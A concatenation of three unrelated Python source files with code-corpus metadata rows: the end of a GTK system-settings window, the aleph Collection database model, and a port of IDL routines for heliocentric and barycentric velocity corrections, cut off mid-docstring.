iter = model.get_iter_first()
while iter != None:
string = model.get_value(iter, 0)
split_by_word = string.split(" ")
for word in split_by_word:
layout = icon_view.create_pango_layout(word)
item_width, item_height = layout.get_pixel_size()
if item_width > min_width_pixels:
min_width_pixels = item_width
if len(word) > min_width_chars:
min_width_chars = len(word)
iter = model.iter_next(iter)
return min_width_chars, min_width_pixels
def pixbuf_data_func(self, column, cell, model, iter, data=None):
wrapper = model.get_value(iter, 1)
if wrapper:
cell.set_property('surface', wrapper.surface)
def prepCategory(self, category):
self.storeFilter[category["id"]].refilter()
if not self.anyVisibleInCategory(category):
return
if self.first_category_done:
widget = Gtk.Separator.new(Gtk.Orientation.HORIZONTAL)
self.side_view_container.pack_start(widget, False, False, 10)
box = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 4)
img = Gtk.Image.new_from_icon_name(category["icon"], Gtk.IconSize.BUTTON)
box.pack_start(img, False, False, 4)
widget = Gtk.Label()
widget.set_use_markup(True)
widget.set_markup('<span size="12000">%s</span>' % category["label"])
widget.set_alignment(.5, .5)
box.pack_start(widget, False, False, 1)
self.side_view_container.pack_start(box, False, False, 0)
widget = Gtk.IconView.new_with_model(self.storeFilter[category["id"]])
area = widget.get_area()
widget.set_item_width(self.min_pix_length)
widget.set_item_padding(0)
widget.set_column_spacing(18)
widget.set_row_spacing(18)
widget.set_margin(20)
pixbuf_renderer = Gtk.CellRendererPixbuf()
text_renderer = Gtk.CellRendererText(ellipsize=Pango.EllipsizeMode.NONE, wrap_mode=Pango.WrapMode.WORD_CHAR, wrap_width=0, width_chars=self.min_label_length, alignment=Pango.Alignment.CENTER)
text_renderer.set_alignment(.5, 0)
area.pack_start(pixbuf_renderer, True, True, False)
area.pack_start(text_renderer, True, True, False)
area.add_attribute(pixbuf_renderer, "icon-name", 1)
pixbuf_renderer.set_property("stock-size", Gtk.IconSize.DIALOG)
pixbuf_renderer.set_property("follow-state", True)
area.add_attribute(text_renderer, "text", 0)
css_provider = Gtk.CssProvider()
css_provider.load_from_data("GtkIconView { \
background-color: transparent; \
} \
GtkIconView.view.cell:selected { \
background-color: @selected_bg_color; \
}")
c = widget.get_style_context()
c.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.side_view[category["id"]] = widget
self.side_view_container.pack_start(self.side_view[category["id"]], False, False, 0)
self.first_category_done = True
self.side_view[category["id"]].connect("item-activated", self.side_view_nav, category["id"])
self.side_view[category["id"]].connect("button-release-event", self.button_press, category["id"])
self.side_view[category["id"]].connect("keynav-failed", self.on_keynav_failed, category["id"])
self.side_view[category["id"]].connect("selection-changed", self.on_selection_changed, category["id"])
def bring_selection_into_view(self, iconview):
sel = iconview.get_selected_items()
if sel:
path = sel[0]
found, rect = iconview.get_cell_rect(path, None)
cw = self.side_view_container.get_window()
cw_x, cw_y = cw.get_position()
ivw = iconview.get_window()
iv_x, iv_y = ivw.get_position()
final_y = rect.y + (rect.height / 2) + cw_y + iv_y
adj = self.side_view_sw.get_vadjustment()
page = adj.get_page_size()
current_pos = adj.get_value()
if final_y > current_pos + page:
adj.set_value(iv_y + rect.y)
elif final_y < current_pos:
adj.set_value(iv_y + rect.y)
def on_selection_changed(self, widget, category):
sel = widget.get_selected_items()
if len(sel) > 0:
self.current_cat_widget = widget
self.bring_selection_into_view(widget)
for iv in self.side_view:
if self.side_view[iv] == self.current_cat_widget:
continue
self.side_view[iv].unselect_all()
def get_cur_cat_index(self, category):
i = 0
for cat in CATEGORIES:
if category == cat["id"]:
return i
i += 1
def get_cur_column(self, iconview):
s, path, cell = iconview.get_cursor()
if path:
col = iconview.get_item_column(path)
return col
def reposition_new_cat(self, sel, iconview):
iconview.set_cursor(sel, None, False)
iconview.select_path(sel)
iconview.grab_focus()
def on_keynav_failed(self, widget, direction, category):
num_cats = len(CATEGORIES)
current_idx = self.get_cur_cat_index(category)
new_cat = CATEGORIES[current_idx]
ret = False
dist = 1000
sel = None
if direction == Gtk.DirectionType.DOWN and current_idx < num_cats - 1:
new_cat = CATEGORIES[current_idx + 1]
col = self.get_cur_column(widget)
new_cat_view = self.side_view[new_cat["id"]]
model = new_cat_view.get_model()
iter = model.get_iter_first()
while iter is not None:
path = model.get_path(iter)
c = new_cat_view.get_item_column(path)
d = abs(c - col)
if d < dist:
sel = path
dist = d
iter = model.iter_next(iter)
self.reposition_new_cat(sel, new_cat_view)
ret = True
elif direction == Gtk.DirectionType.UP and current_idx > 0:
new_cat = CATEGORIES[current_idx - 1]
col = self.get_cur_column(widget)
new_cat_view = self.side_view[new_cat["id"]]
model = new_cat_view.get_model()
iter = model.get_iter_first()
while iter is not None:
path = model.get_path(iter)
c = new_cat_view.get_item_column(path)
d = abs(c - col)
if d <= dist:
sel = path
dist = d
iter = model.iter_next(iter)
self.reposition_new_cat(sel, new_cat_view)
ret = True
return ret
def button_press(self, widget, event, category):
if event.button == 1:
self.side_view_nav(widget, None, category)
def anyVisibleInCategory(self, category):
id = category["id"]
iter = self.storeFilter[id].get_iter_first()
visible = False
while iter is not None:
cat = self.storeFilter[id].get_value(iter, 3)
visible = cat == category["id"]
iter = self.storeFilter[id].iter_next(iter)
return visible
def setParentRefs (self, mod):
try:
mod._setParentRef(self.window)
except AttributeError:
pass
return True
def loadCheck (self, mod):
try:
return mod._loadCheck()
except:
return True
def back_to_icon_view(self, widget):
self.window.set_title(_("System Settings"))
self.window.resize(WIN_WIDTH, WIN_HEIGHT)
children = self.content_box.get_children()
for child in children:
child.hide()
if child.get_name() == "c_box":
c_widgets = child.get_children()
for c_widget in c_widgets:
c_widget.hide()
self.main_stack.set_visible_child_name("side_view_page")
self.header_stack.set_visible_child_name("side_view")
self.search_entry.grab_focus()
self.current_sidepage = None
def quit(self, *args):
self.window.destroy()
Gtk.main_quit()
if __name__ == "__main__":
import signal
ps = proxygsettings.get_proxy_settings()
if ps:
proxy = urllib2.ProxyHandler(ps)
else:
proxy = urllib2.ProxyHandler()
urllib2.install_opener(urllib2.build_opener(proxy))
window = MainWindow()
signal.signal(signal.SIGINT, window.quit)
Gtk.main()
| gpl-2.0 | -2,137,927,399,424,171,300 | 41.743377 | 200 | 0.564318 | false |
gazeti/aleph | aleph/model/collection.py | 2 | 6250 | import logging
from datetime import datetime
from sqlalchemy import func, cast
from sqlalchemy.dialects.postgresql import ARRAY
from aleph.core import db, url_for
from aleph.model.validate import validate
from aleph.model.role import Role
from aleph.model.permission import Permission
from aleph.model.common import IdModel, make_textid
from aleph.model.common import ModelFacets, SoftDeleteModel
log = logging.getLogger(__name__)
class Collection(db.Model, IdModel, SoftDeleteModel, ModelFacets):
_schema = 'collection.json#'
label = db.Column(db.Unicode)
summary = db.Column(db.Unicode, nullable=True)
category = db.Column(db.Unicode, nullable=True)
countries = db.Column(ARRAY(db.Unicode()))
languages = db.Column(ARRAY(db.Unicode()))
foreign_id = db.Column(db.Unicode, unique=True, nullable=False)
# Managed collections are generated by API crawlers and thus UI users
# shouldn't be allowed to add entities or documents to them. They also
# don't use advanced entity extraction features for performance reasons.
managed = db.Column(db.Boolean, default=False)
# Private collections don't show up in peek queries.
private = db.Column(db.Boolean, default=False)
creator_id = db.Column(db.Integer, db.ForeignKey('role.id'), nullable=True)
creator = db.relationship(Role)
def update(self, data):
validate(data, self._schema)
creator_id = data.get('creator_id')
if creator_id is not None and creator_id != self.creator_id:
role = Role.by_id(creator_id)
if role is not None and role.type == Role.USER:
self.creator_id = role.id
Permission.grant_collection(self.id, role, True, True)
self.label = data.get('label')
self.summary = data.get('summary', self.summary)
self.category = data.get('category', self.category)
self.managed = data.get('managed')
self.private = data.get('private')
self.countries = data.pop('countries', [])
self.touch()
def touch(self):
self.updated_at = datetime.utcnow()
db.session.add(self)
def pending_entities(self):
"""Generate a ranked list of the most commonly used pending entities.
This is used for entity review.
"""
from aleph.model.entity import Entity
from aleph.model.reference import Reference
q = db.session.query(Entity)
q = q.filter(Entity.state == Entity.STATE_PENDING)
q = q.join(Reference, Reference.entity_id == Entity.id)
q = q.filter(Entity.collection_id == self.id)
q = q.group_by(Entity)
return q.order_by(func.sum(Reference.weight).desc())
@classmethod
def by_foreign_id(cls, foreign_id, deleted=False):
if foreign_id is None:
return
q = cls.all(deleted=deleted)
return q.filter(cls.foreign_id == foreign_id).first()
@classmethod
def create(cls, data, role=None):
foreign_id = data.get('foreign_id') or make_textid()
collection = cls.by_foreign_id(foreign_id, deleted=True)
if collection is None:
collection = cls()
collection.foreign_id = foreign_id
collection.creator = role
collection.update(data)
db.session.add(collection)
db.session.flush()
if role is not None:
Permission.grant_collection(collection.id,
role, True, True)
collection.deleted_at = None
return collection
@classmethod
def find(cls, label=None, category=[], countries=[], managed=None,
collection_id=None):
q = db.session.query(cls)
q = q.filter(cls.deleted_at == None) # noqa
if label and len(label.strip()):
label = '%%%s%%' % label.strip()
q = q.filter(cls.label.ilike(label))
q = q.filter(cls.id.in_(collection_id))
if len(category):
q = q.filter(cls.category.in_(category))
if len(countries):
types = cast(countries, ARRAY(db.Unicode()))
q = q.filter(cls.countries.contains(types))
if managed is not None:
q = q.filter(cls.managed == managed)
return q
def __repr__(self):
return '<Collection(%r, %r)>' % (self.id, self.label)
def __unicode__(self):
return self.label
@property
def is_public(self):
if not hasattr(self, '_is_public'):
try:
from flask import request
self._is_public = request.authz.collection_public(self.id)
except:
self._is_public = None
return self._is_public
@property
def roles(self):
q = db.session.query(Permission.role_id)
q = q.filter(Permission.collection_id == self.id) # noqa
q = q.filter(Permission.read == True) # noqa
return [e.role_id for e in q.all()]
def get_document_count(self):
return self.documents.count()
def get_entity_count(self, state=None):
from aleph.model.entity import Entity
q = Entity.all()
q = q.filter(Entity.collection_id == self.id)
if state is not None:
q = q.filter(Entity.state == state)
return q.count()
def to_dict(self, counts=False):
data = super(Collection, self).to_dict()
data.update({
'api_url': url_for('collections_api.view', id=self.id),
'foreign_id': self.foreign_id,
'creator_id': self.creator_id,
'label': self.label,
'summary': self.summary,
'category': self.category,
'countries': self.countries,
'managed': self.managed,
'public': self.is_public
})
if counts:
# Query how many enitites and documents are in this collection.
from aleph.model.entity import Entity
data.update({
'doc_count': self.get_document_count(),
'entity_count': self.get_entity_count(Entity.STATE_ACTIVE),
'pending_count': self.get_entity_count(Entity.STATE_PENDING)
})
return data
| mit | 2,366,045,524,785,914,400 | 36.42515 | 79 | 0.60224 | false |
eteq/erikutils | erikutils/xkeckhelio.py | 1 | 23585 | #This is a direct port of x_keckhelio.pro from XIDL
from __future__ import division, print_function
from math import pi
from numpy import cos, sin
import numpy as np
def x_keckhelio(ra, dec, epoch=2000.0, jd=None, tai=None,
longitude=None, latitude=None, altitude=None, obs='keck'):
"""
`ra` and `dec` in degrees
Returns `vcorr`: "Velocity correction term, in km/s, to add to measured
radial velocity to convert it to the heliocentric frame."
but the sign seems to be backwards of what that says:
helio_shift = -1. * x_keckhelio(RA, DEC, 2000.0)
uses barvel and ct2lst functions from idlastro, also ported below
#NOTE: this seems to have some jitter about the IDL version at the .1 km/s level
"""
if longitude is not None and latitude is not None and altitude is not None:
print('using long/lat/alt instead of named observatory')
elif obs == 'keck':
longitude = 360. - 155.47220
latitude = 19.82656886
altitude = 4000. #meters
else:
print('Using observatory', obs)
if obs == 'vlt':
longitude = 360. - 70.40322
latitude = -24.6258
altitude = 2635. #meters
elif obs == 'mmt':
longitude = 360. - 110.88456
latitude = 31.688778
altitude = 2600. #meters
elif obs == 'lick':
longitude = 360. - 121.637222
latitude = 37.343056
altitude = 1283. #meters
else:
raise ValueError('unrecognized observatory' + obs)
if jd is None and tai is not None:
jd = 2400000.5 + tai / (24. * 3600.)
elif tai is None and jd is not None:
pass
else:
raise ValueError('Must specify either JD or TAI')
DRADEG = 180.0 / pi
# ----------
# Compute baryocentric velocity (Accurate only to 1m/s)
dvelh, dvelb = baryvel(jd, epoch)
#Project velocity toward star
vbarycen = dvelb[0]*cos(dec/DRADEG)*cos(ra/DRADEG) + \
dvelb[1]*cos(dec/DRADEG)*sin(ra/DRADEG) + dvelb[2]*sin(dec/DRADEG)
#----------
#Compute rotational velocity of observer on the Earth
#LAT is the latitude in radians.
latrad = latitude / DRADEG
#Reduction of geodetic latitude to geocentric latitude (radians).
#DLAT is in arcseconds.
dlat = -(11. * 60. + 32.743000) * sin(2. * latrad) + \
1.163300 * sin(4. * latrad) -0.002600 * sin(6. * latrad)
latrad = latrad + (dlat / 3600.) / DRADEG
#R is the radius vector from the Earth's center to the observer (meters).
#VC is the corresponding circular velocity
#(meters/sidereal day converted to km / sec).
#(sidereal day = 23.934469591229 hours (1986))
r = 6378160.0 * (0.998327073 + 0.00167643800 * cos(2. * latrad) - \
0.00000351 * cos(4. * latrad) + 0.000000008 * cos(6. * latrad)) \
+ altitude
vc = 2. * pi * (r / 1000.) / (23.934469591229 * 3600.)
#Compute the hour angle, HA, in degrees
LST = 15. * ct2lst(longitude, 'junk', jd) # convert from hours to degrees
HA = LST - ra
#Project the velocity onto the line of sight to the star.
vrotate = vc * cos(latrad) * cos(dec/DRADEG) * sin(HA/DRADEG)
return (-vbarycen + vrotate)
def ct2lst(lng, tz, jd, day=None, mon=None, year=None):
"""
# NAME:
# CT2LST
# PURPOSE:
# To convert from Local Civil Time to Local Mean Sidereal Time.
#
# CALLING SEQUENCE:
# CT2LST, Lst, Lng, Tz, Time, [Day, Mon, Year] #NOT SUPPORTED IN PYTHON PORT!
# or
# CT2LST, Lst, Lng, dummy, JD
#
# INPUTS:
# Lng - The longitude in degrees (east of Greenwich) of the place for
# which the local sidereal time is desired, scalar. The Greenwich
# mean sidereal time (GMST) can be found by setting Lng = 0.
# Tz - The time zone of the site in hours, positive East of the Greenwich
# meridian (ahead of GMT). Use this parameter to easily account
# for Daylight Savings time (e.g. -4=EDT, -5 = EST/CDT), scalar
# This parameter is not needed (and ignored) if Julian date is
# supplied. ***Note that the sign of TZ was changed in July 2008
# to match the standard definition.***
# Time or JD - If more than four parameters are specified, then this is
# the time of day of the specified date in decimal hours. If
# exactly four parameters are specified, then this is the
# Julian date of time in question, scalar or vector
#
# OPTIONAL INPUTS:
# Day - The day of the month (1-31),integer scalar or vector
# Mon - The month, in numerical format (1-12), integer scalar or vector
# Year - The 4 digit year (e.g. 2008), integer scalar or vector
#
# OUTPUTS:
# Lst The Local Sidereal Time for the date/time specified in hours.
#
# RESTRICTIONS:
# If specified, the date should be in numerical form. The year should
# appear as yyyy.
#
# PROCEDURE:
# The Julian date of the day and time is question is used to determine
# the number of days to have passed since 0 Jan 2000. This is used
# in conjunction with the GST of that date to extrapolate to the current
# GST# this is then used to get the LST. See Astronomical Algorithms
# by Jean Meeus, p. 84 (Eq. 11-4) for the constants used.
#
# EXAMPLE:
# Find the Greenwich mean sidereal time (GMST) on 2008 Jul 30 at 15:53 pm
# in Baltimore, Maryland (longitude=-76.72 degrees). The timezone is
# EDT or tz=-4
#
# IDL> CT2LST, lst, -76.72, -4,ten(15,53), 30, 07, 2008
#
# ==> lst = 11.356505 hours (= 11h 21m 23.418s)
#
# The Web site http://tycho.usno.navy.mil/sidereal.html contains more
# info on sidereal time, as well as an interactive calculator.
# PROCEDURES USED:
# jdcnv - Convert from year, month, day, hour to julian date
#
# MODIFICATION HISTORY:
# Adapted from the FORTRAN program GETSD by Michael R. Greason, STX,
# 27 October 1988.
# Use IAU 1984 constants Wayne Landsman, HSTX, April 1995, results
# differ by about 0.1 seconds
# Longitudes measured *east* of Greenwich W. Landsman December 1998
# Time zone now measure positive East of Greenwich W. Landsman July 2008
# Remove debugging print statement W. Landsman April 2009
"""
# IF N_params() gt 4 THEN BEGIN
# time = tme - tz
# jdcnv, year, mon, day, time, jd
# ENDIF ELSE jd = double(tme)
#
# Useful constants, see Meeus, p.84
#
c = [280.46061837, 360.98564736629, 0.000387933, 38710000.0]
jd2000 = 2451545.0
t0 = jd - jd2000
t = t0 / 36525
#
# Compute GST in seconds.
#
theta = c[0] + (c[1] * t0) + t ** 2 * (c[2] - t / c[3])
#
# Compute LST in hours.
#
lst = np.array((theta + lng) / 15.0)
neg = lst < 0
if np.sum(neg) > 0:
if neg.shape == tuple():
lst = 24. + idl_like_mod(lst, 24.)
else:
lst[neg] = 24. + idl_like_mod(lst[neg], 24.)
return idl_like_mod(lst, 24.)
def baryvel(dje, deq):
#+
# NAME:
# BARYVEL
# PURPOSE:
# Calculates heliocentric and barycentric velocity components of Earth.
#
# EXPLANATION:
# BARYVEL takes into account the Earth-Moon motion, and is useful for
# radial velocity work to an accuracy of ~1 m/s.
#
# CALLING SEQUENCE:
# BARYVEL, dje, deq, dvelh, dvelb, [ JPL = ]
#
# INPUTS:
# DJE - (scalar) Julian ephemeris date.
# DEQ - (scalar) epoch of mean equinox of dvelh and dvelb. If deq=0
# then deq is assumed to be equal to dje.
# OUTPUTS:
# DVELH: (vector(3)) heliocentric velocity component. in km/s
# DVELB: (vector(3)) barycentric velocity component. in km/s
#
# The 3-vectors DVELH and DVELB are given in a right-handed coordinate
# system with the +X axis toward the Vernal Equinox, and +Z axis
# toward the celestial pole.
#
# OPTIONAL KEYWORD SET:
# JPL - if /JPL set, then BARYVEL will call the procedure JPLEPHINTERP
# to compute the Earth velocity using the full JPL ephemeris.
# The JPL ephemeris FITS file JPLEPH.405 must exist in either the
# current directory, or in the directory specified by the
# environment variable ASTRO_DATA. Alternatively, the JPL keyword
# can be set to the full path and name of the ephemeris file.
# A copy of the JPL ephemeris FITS file is available in
# http://idlastro.gsfc.nasa.gov/ftp/data/
# PROCEDURES CALLED:
# Function PREMAT() -- computes precession matrix
# JPLEPHREAD, JPLEPHINTERP, TDB2TDT - if /JPL keyword is set
# NOTES:
# Algorithm taken from FORTRAN program of Stumpff (1980, A&A Suppl, 41,1)
# Stumpf claimed an accuracy of 42 cm/s for the velocity. A
# comparison with the JPL FORTRAN planetary ephemeris program PLEPH
# found agreement to within about 65 cm/s between 1986 and 1994
#
# If /JPL is set (using JPLEPH.405 ephemeris file) then velocities are
# given in the ICRS system# otherwise in the FK4 system.
# EXAMPLE:
# Compute the radial velocity of the Earth toward Altair on 15-Feb-1994
# using both the original Stumpf algorithm and the JPL ephemeris
#
# IDL> jdcnv, 1994, 2, 15, 0, jd #==> JD = 2449398.5
# IDL> baryvel, jd, 2000, vh, vb #Original algorithm
# ==> vh = [-17.07243, -22.81121, -9.889315] #Heliocentric km/s
# ==> vb = [-17.08083, -22.80471, -9.886582] #Barycentric km/s
# IDL> baryvel, jd, 2000, vh, vb, /jpl #JPL ephemeris
# ==> vh = [-17.07236, -22.81126, -9.889419] #Heliocentric km/s
# ==> vb = [-17.08083, -22.80484, -9.886409] #Barycentric km/s
#
# IDL> ra = ten(19,50,46.77)*15/!RADEG #RA in radians
# IDL> dec = ten(08,52,3.5)/!RADEG #Dec in radians
# IDL> v = vb[0]*cos(dec)*cos(ra) + $ #Project velocity toward star
# vb[1]*cos(dec)*sin(ra) + vb[2]*sin(dec)
#
# REVISION HISTORY:
# Jeff Valenti, U.C. Berkeley Translated BARVEL.FOR to IDL.
# W. Landsman, Cleaned up program sent by Chris McCarthy (SfSU) June 1994
# Converted to IDL V5.0 W. Landsman September 1997
# Added /JPL keyword W. Landsman July 2001
# Documentation update W. Landsman Dec 2005
#-
#Define constants
dc2pi = 2* pi
cc2pi = dc2pi
dc1 = 1.0
dcto = 2415020.0
dcjul = 36525.0 #days in Julian year
dcbes = 0.313
dctrop = 365.24219572 #days in tropical year (...572 insig)
dc1900 = 1900.0
AU = 1.4959787e8
#Constants dcfel(i,k) of fast changing elements.
dcfel = [1.7400353e00, 6.2833195099091e02, 5.2796e-6 \
,6.2565836e00, 6.2830194572674e02, -2.6180e-6 \
,4.7199666e00, 8.3997091449254e03, -1.9780e-5 \
,1.9636505e-1, 8.4334662911720e03, -5.6044e-5 \
,4.1547339e00, 5.2993466764997e01, 5.8845e-6 \
,4.6524223e00, 2.1354275911213e01, 5.6797e-6 \
,4.2620486e00, 7.5025342197656e00, 5.5317e-6 \
,1.4740694e00, 3.8377331909193e00, 5.6093e-6 ]
dcfel = np.array(dcfel).reshape(8,3)
#constants dceps and ccsel(i,k) of slowly changing elements.
dceps = [4.093198e-1, -2.271110e-4, -2.860401e-8 ]
ccsel = [1.675104E-2, -4.179579E-5, -1.260516E-7 \
,2.220221E-1, 2.809917E-2, 1.852532E-5 \
,1.589963E00, 3.418075E-2, 1.430200E-5 \
,2.994089E00, 2.590824E-2, 4.155840E-6 \
,8.155457E-1, 2.486352E-2, 6.836840E-6 \
,1.735614E00, 1.763719E-2, 6.370440E-6 \
,1.968564E00, 1.524020E-2, -2.517152E-6 \
,1.282417E00, 8.703393E-3, 2.289292E-5 \
,2.280820E00, 1.918010E-2, 4.484520E-6 \
,4.833473E-2, 1.641773E-4, -4.654200E-7 \
,5.589232E-2, -3.455092E-4, -7.388560E-7 \
,4.634443E-2, -2.658234E-5, 7.757000E-8 \
,8.997041E-3, 6.329728E-6, -1.939256E-9 \
,2.284178E-2, -9.941590E-5, 6.787400E-8 \
,4.350267E-2, -6.839749E-5, -2.714956E-7 \
,1.348204E-2, 1.091504E-5, 6.903760E-7 \
,3.106570E-2, -1.665665E-4, -1.590188E-7 ]
ccsel = np.array(ccsel).reshape(17,3)
#Constants of the arguments of the short-period perturbations.
dcargs = [5.0974222, -7.8604195454652e2 \
,3.9584962, -5.7533848094674e2 \
,1.6338070, -1.1506769618935e3 \
,2.5487111, -3.9302097727326e2 \
,4.9255514, -5.8849265665348e2 \
,1.3363463, -5.5076098609303e2 \
,1.6072053, -5.2237501616674e2 \
,1.3629480, -1.1790629318198e3 \
,5.5657014, -1.0977134971135e3 \
,5.0708205, -1.5774000881978e2 \
,3.9318944, 5.2963464780000e1 \
,4.8989497, 3.9809289073258e1 \
,1.3097446, 7.7540959633708e1 \
,3.5147141, 7.9618578146517e1 \
,3.5413158, -5.4868336758022e2 ]
dcargs = np.array(dcargs).reshape(15,2)
#Amplitudes ccamps(n,k) of the short-period perturbations.
ccamps = \
[-2.279594E-5, 1.407414E-5, 8.273188E-6, 1.340565E-5, -2.490817E-7 \
,-3.494537E-5, 2.860401E-7, 1.289448E-7, 1.627237E-5, -1.823138E-7 \
, 6.593466E-7, 1.322572E-5, 9.258695E-6, -4.674248E-7, -3.646275E-7 \
, 1.140767E-5, -2.049792E-5, -4.747930E-6, -2.638763E-6, -1.245408E-7 \
, 9.516893E-6, -2.748894E-6, -1.319381E-6, -4.549908E-6, -1.864821E-7 \
, 7.310990E-6, -1.924710E-6, -8.772849E-7, -3.334143E-6, -1.745256E-7 \
,-2.603449E-6, 7.359472E-6, 3.168357E-6, 1.119056E-6, -1.655307E-7 \
,-3.228859E-6, 1.308997E-7, 1.013137E-7, 2.403899E-6, -3.736225E-7 \
, 3.442177E-7, 2.671323E-6, 1.832858E-6, -2.394688E-7, -3.478444E-7 \
, 8.702406E-6, -8.421214E-6, -1.372341E-6, -1.455234E-6, -4.998479E-8 \
,-1.488378E-6, -1.251789E-5, 5.226868E-7, -2.049301E-7, 0.E0 \
,-8.043059E-6, -2.991300E-6, 1.473654E-7, -3.154542E-7, 0.E0 \
, 3.699128E-6, -3.316126E-6, 2.901257E-7, 3.407826E-7, 0.E0 \
, 2.550120E-6, -1.241123E-6, 9.901116E-8, 2.210482E-7, 0.E0 \
,-6.351059E-7, 2.341650E-6, 1.061492E-6, 2.878231E-7, 0.E0 ]
ccamps = np.array(ccamps).reshape(15,5)
#Constants csec3 and ccsec(n,k) of the secular perturbations in longitude.
ccsec3 = -7.757020E-8
ccsec = [1.289600E-6, 5.550147E-1, 2.076942E00 \
,3.102810E-5, 4.035027E00, 3.525565E-1 \
,9.124190E-6, 9.990265E-1, 2.622706E00 \
,9.793240E-7, 5.508259E00, 1.559103E01 ]
ccsec = np.array(ccsec).reshape(4,3)
#Sidereal rates.
dcsld = 1.990987e-7 #sidereal rate in longitude
ccsgd = 1.990969E-7 #sidereal rate in mean anomaly
#Constants used in the calculation of the lunar contribution.
cckm = 3.122140E-5
ccmld = 2.661699E-6
ccfdi = 2.399485E-7
#Constants dcargm(i,k) of the arguments of the perturbations of the motion
# of the moon.
dcargm = [5.1679830, 8.3286911095275e3 \
,5.4913150, -7.2140632838100e3 \
,5.9598530, 1.5542754389685e4 ]
dcargm = np.array(dcargm).reshape(3,2)
#Amplitudes ccampm(n,k) of the perturbations of the moon.
ccampm = [ 1.097594E-1, 2.896773E-7, 5.450474E-2, 1.438491E-7 \
,-2.223581E-2, 5.083103E-8, 1.002548E-2, -2.291823E-8 \
, 1.148966E-2, 5.658888E-8, 8.249439E-3, 4.063015E-8 ]
ccampm = np.array(ccampm).reshape(3,4)
#ccpamv(k)=a*m*dl,dt (planets), dc1mme=1-mass(earth+moon)
ccpamv = [8.326827E-11, 1.843484E-11, 1.988712E-12, 1.881276E-12]
dc1mme = 0.99999696
#Time arguments.
dt = (dje - dcto) / dcjul
tvec = np.array([1., dt, dt*dt])
#Values of all elements for the instant(aneous?) dje.
temp = idl_like_mod(idl_like_pound(tvec,dcfel), dc2pi)
#PROBLEM: the mod here is where the 100 m/s error slips in
dml = temp[:,0]
forbel = temp[:,1:8]
g = forbel[:,0] #old fortran equivalence
deps = idl_like_mod(np.sum(tvec*dceps), dc2pi)
sorbel = idl_like_mod(idl_like_pound(tvec, ccsel), dc2pi)
e = sorbel[:, 0] #old fortran equivalence
#Secular perturbations in longitude.
dummy=cos(2.0)
sn = sin(idl_like_mod(idl_like_pound(tvec.ravel()[0:2] , ccsec[:, 1:3]),cc2pi))
#Periodic perturbations of the emb (earth-moon barycenter).
pertl = np.sum(ccsec[:,0] * sn) + dt*ccsec3*sn.ravel()[2]
pertld = 0.0
pertr = 0.0
pertrd = 0.0
for k in range(14):
a = idl_like_mod((dcargs[k,0]+dt*dcargs[k,1]), dc2pi)
cosa = cos(a)
sina = sin(a)
pertl = pertl + ccamps[k,0]*cosa + ccamps[k,1]*sina
pertr = pertr + ccamps[k,2]*cosa + ccamps[k,3]*sina
if k < 11:
pertld = pertld + (ccamps[k,1]*cosa-ccamps[k,0]*sina)*ccamps[k,4]
pertrd = pertrd + (ccamps[k,3]*cosa-ccamps[k,2]*sina)*ccamps[k,4]
#Elliptic part of the motion of the emb.
phi = (e*e/4)*(((8/e)-e)*sin(g) +5*sin(2*g) +(13/3)*e*sin(3*g))
f = g + phi
sinf = sin(f)
cosf = cos(f)
dpsi = (dc1 - e*e) / (dc1 + e*cosf)
phid = 2*e*ccsgd*((1 + 1.5*e*e)*cosf + e*(1.25 - 0.5*sinf*sinf))
psid = ccsgd*e*sinf * (dc1 - e*e)**-0.5
#Perturbed heliocentric motion of the emb.
d1pdro = dc1+pertr
drd = d1pdro * (psid + dpsi*pertrd)
drld = d1pdro*dpsi * (dcsld+phid+pertld)
dtl = idl_like_mod((dml + phi + pertl), dc2pi)
dsinls = sin(dtl)
dcosls = cos(dtl)
dxhd = drd*dcosls - drld*dsinls
dyhd = drd*dsinls + drld*dcosls
#Influence of eccentricity, evection and variation on the geocentric
# motion of the moon.
pertl = 0.0
pertld = 0.0
pertp = 0.0
pertpd = 0.0
for k in range(2):
a = idl_like_mod((dcargm[k,0] + dt*dcargm[k,1]), dc2pi)
sina = sin(a)
cosa = cos(a)
pertl = pertl + ccampm[k,0]*sina
pertld = pertld + ccampm[k,1]*cosa
pertp = pertp + ccampm[k,2]*cosa
pertpd = pertpd - ccampm[k,3]*sina
#Heliocentric motion of the earth.
tl = forbel.ravel()[1] + pertl
sinlm = sin(tl)
coslm = cos(tl)
sigma = cckm / (1.0 + pertp)
a = sigma*(ccmld + pertld)
b = sigma*pertpd
dxhd = dxhd + a*sinlm + b*coslm
dyhd = dyhd - a*coslm + b*sinlm
dzhd= -sigma*ccfdi*cos(forbel.ravel()[2])
#Barycentric motion of the earth.
dxbd = dxhd*dc1mme
dybd = dyhd*dc1mme
dzbd = dzhd*dc1mme
for k in range(3):
plon = forbel.ravel()[k+3]
pomg = sorbel.ravel()[k+1]
pecc = sorbel.ravel()[k+9]
tl = idl_like_mod((plon + 2.0*pecc*sin(plon-pomg)), cc2pi)
dxbd = dxbd + ccpamv[k]*(sin(tl) + pecc*sin(pomg))
dybd = dybd - ccpamv[k]*(cos(tl) + pecc*cos(pomg))
dzbd = dzbd - ccpamv[k]*sorbel.ravel()[k+13]*cos(plon - sorbel.ravel()[k+5])
#Transition to mean equator of date.
dcosep = cos(deps)
dsinep = sin(deps)
dyahd = dcosep*dyhd - dsinep*dzhd
dzahd = dsinep*dyhd + dcosep*dzhd
dyabd = dcosep*dybd - dsinep*dzbd
dzabd = dsinep*dybd + dcosep*dzbd
#Epoch of mean equinox (deq) of zero implies that we should use
# Julian ephemeris date (dje) as epoch of mean equinox.
if deq == 0:
dvelh = AU * ([dxhd, dyahd, dzahd])
dvelb = AU * ([dxbd, dyabd, dzabd])
return dvelh, dvelb
#General precession from epoch dje to deq.
deqdat = (dje-dcto-dcbes) / dctrop + dc1900
prema = premat(deqdat,deq,FK4=True)
dvelh = AU * idl_like_pound( prema, [dxhd, dyahd, dzahd] )
dvelb = AU * idl_like_pound( prema, [dxbd, dyabd, dzabd] )
return dvelh, dvelb
def premat(equinox1, equinox2, FK4=False):
"""
#+
# NAME:
# PREMAT
# PURPOSE:
# Return the precession matrix needed to go from EQUINOX1 to EQUINOX2.
# EXPLANTION:
# This matrix is used by the procedures PRECESS and BARYVEL to precess
# astronomical coordinates
#
# CALLING SEQUENCE:
# matrix = PREMAT( equinox1, equinox2, [ /FK4 ] )
#
# INPUTS:
# EQUINOX1 - Original equinox of coordinates, numeric scalar.
# EQUINOX2 - Equinox of precessed coordinates.
#
# OUTPUT:
# matrix - double precision 3 x 3 precession matrix, used to precess
